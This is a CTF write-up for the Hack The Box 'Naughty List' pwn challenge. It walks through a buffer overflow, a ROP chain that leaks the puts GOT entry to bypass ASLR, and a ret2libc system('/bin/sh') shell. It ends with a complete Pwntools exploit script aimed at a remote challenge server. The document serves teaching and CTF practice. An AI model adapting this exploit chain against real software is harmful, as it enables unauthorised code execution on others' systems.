Monday, December 6, 2021

Hack The Box Cyber Santa CTF - Pwn Day 3 - Naughty List Writeup

 


Challenge Files:  pwn_naughty_list.zip

  •     13320  2021-11-17 11:42   naughty_list
  •   2030928  2021-11-17 11:42   libc.so.6

Exploitation Techniques:  Return Oriented Programming (ROP) to leak GOT address to calculate the base address of where the libc file is loaded into memory.  Return-to-libc (ret2libc) to get a shell by executing system(address_to_"/bin/sh") from the addresses in the provided libc.so.6 file, also known as Return-to-system (ret2system).

Protections Defeated:  Bypassed ASLR, Bypassed No-Execute (NX) bit

Details:
The first thing to do is get a snapshot of the challenge with file and checksec:

naughty_list: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=01bfbb5590fb022140bbaaae3d3ba8ed2a8b57ba, not stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)    # The function addresses are as is for easy tracking

NX is enabled, so we can't inject shellcode.  They provided a libc file, so if we can find/leak/calculate the libc base address, we can win.  Running the binary, we get a blindingly colorful menu system that asks us 4 personal questions, then exits.  Naturally, I said I was 100 years old.


Our goal now is to figure out which of these input fields gives us a buffer overflow so we can get to some pwning.  Looking through the decompiled code in Ghidra, we found our buffer overflow in the get_descr() function where it asks us what gift we want.  The read() function tries to squeeze 960 bytes into a buffer of 32 bytes:


Time to see how many A's it takes to overwrite the saved RIP.  I loaded up Pwntools and made GDB attach to the process with a breakpoint on the ret instruction at the end of the get_descr() function so we can track what address it returns to:

gdb.attach(p, '''
break *get_descr+81
c
''')

The buffer is 32 bytes, and the next 8 bytes hold the saved RBP, so the saved RIP should start right after that, 40 bytes into our input.  I received the first three questions, sent back answers to them, and sent this payload to the "Name of the gift" question:

# Thousand C's to see how much we can write on the stack after RIP
payload = b"A"*40 + b"B"*8 + b"C"*1000
p.sendline(payload)
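The offset arithmetic can be checked without touching the binary.  This is a minimal sketch in plain Python (no Pwntools); the constant names are made up for illustration, and the 960-byte limit is the read() size seen in the decompiled get_descr():

```python
# Stack layout of get_descr() as described above (names are illustrative).
BUF_SIZE = 32         # local buffer
SAVED_RBP_SIZE = 8    # saved RBP sits right after the buffer
READ_SIZE = 960       # number of bytes read() will copy in

rip_offset = BUF_SIZE + SAVED_RBP_SIZE    # padding needed to reach saved RIP
payload = b"A" * rip_offset + b"B" * 8 + b"C" * 1000

# read() stops after READ_SIZE bytes, so only this much lands on the stack.
on_stack = payload[:READ_SIZE]
saved_rip = on_stack[rip_offset:rip_offset + 8]
c_count = on_stack.count(b"C")

print(rip_offset, saved_rip, c_count)
```

The count of C's is the room left for a ROP chain after the saved RIP slot.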

GDB confirmed the B's (0x42's) showed up in saved RIP.  I also checked to see how many C's made it onto the stack, and good news, it's quite a few!  (912 C's to be exact, more than enough for any ROP-ing).

gef➤  info frame
Stack level 0, frame at 0x7ffdcc449508:
 rip = 0x40107c in get_descr; saved rip = 0x4242424242424242

gef➤  x/300g $rsp
0x7ffdcc449508: 0x4242424242424242      0x4343434343434343
0x7ffdcc449518: 0x4343434343434343      0x4343434343434343
                                        ...
0x7ffdcc449888: 0x4343434343434343      0x4343434343434343
0x7ffdcc449898: 0x4343434343434343      0x0000000000000002

Now we have the B's as a placeholder for an address to jump to.  Our end goal is to call the system() function from the provided libc file with one argument: the address of the "/bin/sh" string, which is also located in the libc file.  However, we don't know the address where libc is loaded into memory; therefore, we don't know the system() or "/bin/sh" address.

So, if we can leak any libc address, we can use that to calculate everything else.  Specifically, if you can leak the address of a libc function that's being used in the binary, you can subtract its tiny offset (taken from an objdump of the libc file) from the leaked address to locate where the libc file begins in memory (a.k.a. the libc base address).  Let's figure out how to ROP chain ourselves into leaking a libc address.

Leaks require a function we can use to print the leak to the screen.  This binary has puts, printf, and fwrite.  The best function to use is puts() because it requires only one argument: a pointer to what it should print.  Next, what argument should we feed into puts to leak onto the screen?

The GOT (Global Offset Table) section of a binary maps each imported libc function to its exact libc address in memory for a specific run of the binary.  With ASLR enabled, the in-memory libc address changes with each run.  In GDB with the GEF plugin, you can view the GOT addresses with the got command:

gef➤  got

GOT protection: Full RelRO | GOT functions: 14

[0x601f80] toupper@GLIBC_2.2.5  →  0x7ffff7e1fa10
[0x601f88] puts@GLIBC_2.2.5  →  0x7ffff7e60210
[0x601f90] strlen@GLIBC_2.2.5  →  0x7ffff7f49220
[0x601f98] printf@GLIBC_2.2.5  →  0x7ffff7e41dc0
[0x601fa0] memset@GLIBC_2.2.5  →  0x7ffff7f4c6a0
[0x601fa8] alarm@GLIBC_2.2.5  →  0x7ffff7eb4d90
[0x601fb0] read@GLIBC_2.2.5  →  0x7ffff7ed88b0
[0x601fb8] srand@GLIBC_2.2.5  →  0x7ffff7e2a0d0
[0x601fc0] strcmp@GLIBC_2.2.5  →  0x7ffff7f44750
[0x601fc8] time@GLIBC_2.2.5  →  0x7ffff7fd0970
[0x601fd0] setvbuf@GLIBC_2.2.5  →  0x7ffff7e608f0
[0x601fd8] __isoc99_scanf@GLIBC_2.7  →  0x7ffff7e431b0
[0x601fe0] fwrite@GLIBC_2.2.5  →  0x7ffff7e5f120
[0x601fe8] rand@GLIBC_2.2.5  →  0x7ffff7e2a7f0

The left side is the address of the GOT entry inside the binary.  Since PIE is disabled, this address stays the same with each run, and if we print out what is stored at that GOT address, we end up printing the libc address it points to for that specific function.  We'll use the puts() function to print out the GOT entry for puts() itself.  So our goal is a call like this:

puts(<puts_GOT_address>)    # From the table above, puts(0x601f88)

In order to feed in the puts GOT address as an argument, we need to put it in the RDI register.  In 32-bit binaries, function arguments are read from the stack, but in 64-bit binaries, the first six integer or pointer arguments are passed in registers in this order:

Argument 1:  RDI
Argument 2:  RSI
Argument 3:  RDX
Argument 4:  RCX
Argument 5:  R8
Argument 6:  R9
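As a quick illustration of that ordering, here is a small plain-Python sketch.  The helper name place_arguments is hypothetical; it only models integer and pointer arguments, with anything past the sixth spilling onto the stack:

```python
# Integer/pointer argument registers for the System V AMD64 calling convention.
ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_arguments(args):
    """Return (register assignments, values left over for the stack)."""
    in_registers = dict(zip(ARG_REGISTERS, args))
    on_stack = list(args[len(ARG_REGISTERS):])
    return in_registers, on_stack

# puts() takes a single pointer, so only RDI matters for the leak.
regs, stack = place_arguments([0x601f88])
print(regs, stack)
```

Because puts() and system() each take one argument, a single "pop rdi" gadget is all this exploit needs.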

So we need to POP the GOT address from the stack into the RDI register with a "gadget" that performs "pop rdi" followed by a "ret" so it can return to another custom address we control from our payload on the stack.  Good thing we control what goes into the stack through our payload (the 912 C's we were able to inject earlier).

A ROP "gadget" is any assembly instruction followed by a return, or call, or jump.  The true definition of a gadget goes further than that where the gadgets are created by combining various opcodes together to form instructions that weren't originally intended to be there, but for the sake of solving this challenge, we'll keep it simple.  There are many ways you can find ROP gadgets in the binary.  Popular tools are Ropper, ROPgadget, and Pwntools (we're going to use Pwntools), but here's how you find ROP gadgets in the binary from the command line using ROPgadget.  We want to pipe it into grep or output it to a file, then grep that because the results could be massive:

ROPgadget --binary naughty_list | grep "pop rdi"
    0x0000000000401443 : pop rdi ; ret 

Bam!  We found a "pop rdi" gadget!  You could manually use this address in your payload, but it'll be more seamless to find this gadget in Pwntools.

elf = ELF("./naughty_list")       # Extract data from binary
rop = ROP(elf)                          # Find ROP gadgets
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] 

It automatically searches the binary for the given "pop rdi; ret" gadget and stores its address in a variable.  If we overwrite the saved RIP with this POP_RDI gadget's address, execution jumps to the line of assembly that executes "pop rdi" and ends with "ret", which returns to the next address we put in our payload.  That pattern of running one small set of instructions and RETURNING to the next address in the payload is called ROP chaining.  ROP-ing is basically writing a bunch of return addresses one after another, and they go off in sequence like a string of firecrackers.

Anyways, in our scenario, as a reminder, we're trying to execute this to leak the libc address for the puts function in this manner:  

puts(<GOT_address_for_puts>)

Our ROP chain accomplishes this by popping the GOT address into RDI, then returning from the POP RDI gadget directly into the puts PLT address.  PLT stands for "Procedure Linkage Table"; each PLT entry is a tiny stub of code (usually about 3 instructions) that looks up the function's GOT entry and jumps to the libc address stored there.

PUTS_PLT = elf.plt['puts']
PUTS_GOT = elf.got['puts']
payload = b"A"*40 + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT)
p.sendline(payload)
received = p.clean(timeout=1)[-8:].strip()    # Receives everything, capture the last 8 bytes as leak
print("Raw leaked bytes: %s" % received) 
leak = u64(received.ljust(8, b"\x00"))        # Pads the raw leaked bytes to 8 and unpacks them as an integer
print("Leaked libc address, puts: %s\n\n" % hex(leak))
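The ljust() padding is needed because puts() prints bytes until it hits a NUL, so a 6-byte userland pointer arrives without its two high zero bytes.  Here is a minimal sketch of the same conversion using only the standard library; the p64 and u64 functions below are stand-ins written for this example, not the Pwntools implementations, and the sample bytes are the puts address from the GOT listing above:

```python
import struct

def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for Pwntools' p64)."""
    return struct.pack("<Q", value)

def u64(data):
    """Unpack exactly 8 little-endian bytes into an integer (stand-in for u64)."""
    return struct.unpack("<Q", data)[0]

# What puts() would print for the address 0x7ffff7e60210: six bytes, then it
# stops at the first zero byte.
raw = b"\x10\x02\xe6\xf7\xff\x7f"

leak = u64(raw.ljust(8, b"\x00"))    # restore the two missing high zero bytes
print(hex(leak))
```

One caveat: if any byte inside the pointer happens to be zero, puts() stops early and the leak comes back truncated, so re-running the exploit is the usual fix.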

It ends up looking like this.  I printed out the raw bytes, as well as it being converted to hex for clarity:

However, ASLR is enabled on virtually every remote server and modern system, so the leaked address changes with each run.  To actually use the leak in our final payload, the process has to stay alive: we make the program loop back to the beginning without exiting, which lets us overflow the same buffer a second time when it reaches the vulnerable read again.  We accomplish this by returning to the address of main().  (The script stores it in a variable called MAIN_PLT, but main is an ordinary symbol in the binary, not a PLT entry.)  Remember our continuing ROP chain: after puts() does our leak, it has to return to something!  So we place the address of main as the next link in the chain, and the program starts over WITHOUT EXITING, which preserves our leaked address:

MAIN_PLT = elf.symbols['main']    # Address of main() (a regular symbol, despite the variable name)
rop1 = b"A"*40 + p64(POP_RDI) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
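To see why the order of those addresses matters, here is a toy model of the chain in plain Python.  It is only a sketch: the "stack" is a list, each "ret" pops the next entry, and the PUTS_PLT and MAIN values are placeholders I made up (the POP_RDI and PUTS_GOT values come from the ROPgadget and got output above):

```python
POP_RDI  = 0x401443    # from the ROPgadget output
PUTS_GOT = 0x601f88    # from the GEF got listing
PUTS_PLT = 0x400800    # placeholder, not the real PLT address
MAIN     = 0x401000    # placeholder, not the real address of main

def run_chain(stack):
    """Walk the chain the way successive ret instructions would."""
    rdi = None
    trace = []
    sp = 0
    while sp < len(stack):
        target = stack[sp]      # ret: pop the next address into RIP
        sp += 1
        if target == POP_RDI:
            rdi = stack[sp]     # pop rdi: consume one data slot
            sp += 1
            trace.append("pop rdi; ret")
        elif target == PUTS_PLT:
            trace.append("puts(%#x)" % rdi)    # puts returns into the next slot
        elif target == MAIN:
            trace.append("main()")             # program starts over
            break
    return trace

chain = [POP_RDI, PUTS_GOT, PUTS_PLT, MAIN]
print(run_chain(chain))
```

The data slot (PUTS_GOT) has to sit directly after the gadget that consumes it, and whatever follows PUTS_PLT is where puts() returns.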

Now that we get a second chance to overwrite RIP, where do we want to jump to?  What's our next goal?  The final goal is to use our leaked puts address to calculate the libc base address, find the address of libc's system() function, and execute this to get us a tasty shell:

system(<address_to_'/bin/sh'>)

Remember, the challenge zip file came bundled with the remote target's libc.so.6 file.  However, different Linux distributions and releases ship different libc versions, so the function offsets differ between them.  Since we're testing this on our local Kali system first, we're running against a different libc than the target's!  So we can't use the included libc file yet.  We need to use our local Kali's libc file, and you can find its path with "ldd".  You could use the full path to the local Kali's libc file, but I personally like to copy it to my working directory for easy access:

$ ldd naughty_list
            libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa89c77d000)
$ cp /lib/x86_64-linux-gnu/libc.so.6 kali_libc

Now we load that libc file into our Pwntools and calculate the following addresses for our final ROP chain:

libc = ELF("kali_libc")
libc.address = leak - libc.symbols['puts']
BINSH = next(libc.search(b"/bin/sh"))    # Locate the address to the string "/bin/sh" in libc file
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

The way we calculate the libc base address is this.  If we disassemble the libc file using objdump (with Intel syntax cuz AT&T assembly syntax is disgusting), and search for the puts function call address, we get this offset:

objdump -M intel -d kali_libc | grep "puts@"
0000000000076210 <_IO_puts@@GLIBC_2.2.5>:

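Notice that the last 3 hex digits of that offset match the last 3 hex digits of the address it was loaded to in memory:  0x7f5226ca9210.  That's because ASLR moves libc around in whole 4 KB pages (0x1000 bytes), so the low 12 bits of every address stay the same.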

Now if we subtract the tiny libc offset from the bigger address, we get the libc base address, which corresponds to byte 0 of the libc file.  From there, we can calculate our way to ANY address in libc by adding its offset to this base address.  This is what the following line from the code above does in Pwntools:

libc.address = leak - libc.symbols['puts']
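Here is that subtraction worked out by hand in plain Python, using the leaked address and the objdump offset shown above.  The resolve() helper is just an illustrative name for "base plus offset":

```python
leak = 0x7f5226ca9210      # runtime address of puts from the example run
puts_offset = 0x76210      # offset of puts inside kali_libc, per objdump

libc_base = leak - puts_offset
print(hex(libc_base))

# Sanity checks worth keeping in a real exploit: a wrong libc file or a
# truncated leak usually shows up as a base that is not page aligned.
page_aligned = (libc_base & 0xfff) == 0
low_bits_match = (leak & 0xfff) == (puts_offset & 0xfff)

def resolve(offset):
    """Turn an offset inside the libc file into a runtime address."""
    return libc_base + offset
```

If page_aligned comes out False, the leak or the libc file is almost certainly wrong, and it's better to stop there than to send the second payload.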

You'll also see from the code above that we used this libc base address to calculate where the string "/bin/sh" is stored in libc, the system() function's address, and the exit() function's address.  The reason we got the exit function's address is that when we exit our shell, we want the process to exit gracefully with a real exit instead of crashing, although this is completely optional!  I like to keep a clean house.  Oh, I also noticed that sometimes I need to find the address of a single "ret" instruction on its own and ROP to it immediately before calling system() to align the stack.  The x86-64 calling convention expects the stack to be 16-byte aligned at a call, and some libc builds use SSE instructions inside system() that crash on a misaligned stack.  Locally, it didn't matter for me, but the remote target often needs this extra "ret" to call system() correctly:

ret = (rop.find_gadget(['ret']))[0]
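The effect of that extra "ret" is easy to check with arithmetic.  This sketch assumes the saved RIP slot sits at 0x7ffdcc449508, as in the GDB output earlier (the exact value changes per run, but it always ends in 8 because get_descr() was reached through a normal call); the function name is made up for this example:

```python
def rsp_at_system_entry(saved_rip_slot, with_ret_gadget):
    """Track RSP from get_descr's ret until execution reaches system()."""
    rsp = saved_rip_slot
    rsp += 8        # get_descr's ret pops the pop-rdi gadget address
    rsp += 8        # pop rdi consumes the "/bin/sh" pointer
    rsp += 8        # the gadget's ret pops the next address in the chain
    if with_ret_gadget:
        rsp += 8    # the extra ret gadget pops system's address
    return rsp

slot = 0x7ffdcc449508
without_ret = rsp_at_system_entry(slot, with_ret_gadget=False) % 16
with_ret = rsp_at_system_entry(slot, with_ret_gadget=True) % 16
print(without_ret, with_ret)
```

A function entered through a normal call sees RSP % 16 == 8, because the call pushed an 8-byte return address onto an aligned stack.  Only the chain with the extra "ret" reproduces that state.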

Okay!  We finally have all the pieces to put together the final ROP chain!  Similar to how we popped the puts GOT address into RDI as argument 1, this time, we pop the "/bin/sh" string's address into RDI as argument 1 to system().  It looks like this:

payload = b"A"*40 + p64(POP_RDI) + p64(BINSH) + p64(ret) + p64(SYSTEM) + p64(EXIT)
p.sendline(payload)
p.interactive()    # Need this to have an interactive shell so we can talk back and forth

AND HERE WE HAVE IT!  Our beautiful shell and flag! 


HTB{u_w1ll_b3_n4ughtyf13d_1f_u_4r3_g3tt1ng_4_g1ft}

APPENDIX (Full Exploit Code):
--------------------------------------------------------------------------------------------------------------------
from pwn import *

local_bin = "./naughty_list"
p = remote('178.62.5.61', 31365)
print(p.recvuntil(': ', timeout=1)) # Enter your name
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your surname
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your age
p.sendline("100")
print(p.recvuntil(': ', timeout=1)) # Name of gift you want?

# Gather instruction addresses
elf = ELF(local_bin) # Extract data from binary
rop = ROP(elf) # Find ROP gadgets
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
ret = (rop.find_gadget(['ret']))[0]
PUTS_PLT = elf.plt['puts']
FUNC_GOT = elf.got['puts']
MAIN_PLT = elf.symbols['main']
log.info("Main start: " + hex(MAIN_PLT))
log.info("puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret  gadget: " + hex(POP_RDI))

# Create ROP chain to leak puts GOT address
rop1 = b"A"*40 + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
p.recvline(timeout=1).strip()
p.recvline(timeout=1).strip()
received = p.recvline(timeout=1).strip()
print("Received: '%s'" % received)
leak = u64(received.ljust(8, b"\x00"))
log.info("Leaked libc address, puts: "+ hex(leak))

# Start from the beginning of the program
print(p.recvuntil(': ', timeout=1)) # Enter your name
p.sendline("RoarRibbit")
print(p.recvuntil(': ', timeout=1)) # Enter your surname
p.sendline("RoarRibbit") 
print(p.recvuntil(': ', timeout=1))     # Enter your age
p.sendline("100")
print(p.recvuntil(': ', timeout=1))     # Name of gift you want?

# Calculate LIBC addresses for system(address_to_"/bin/sh")
libc = ELF("libc.so.6")
libc.address = leak - libc.symbols['puts']
log.info("libc base @ %s" % hex(libc.address))

# Find offsets in the libc file
BINSH = next(libc.search(b"/bin/sh")) #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

# Return-to-libc
payload = b"A"*40 + p64(POP_RDI) + p64(BINSH) + p64(ret) + p64(SYSTEM) + p64(EXIT)
p.sendline(payload)

p.interactive()
--------------------------------------------------------------------------------------------------------------------
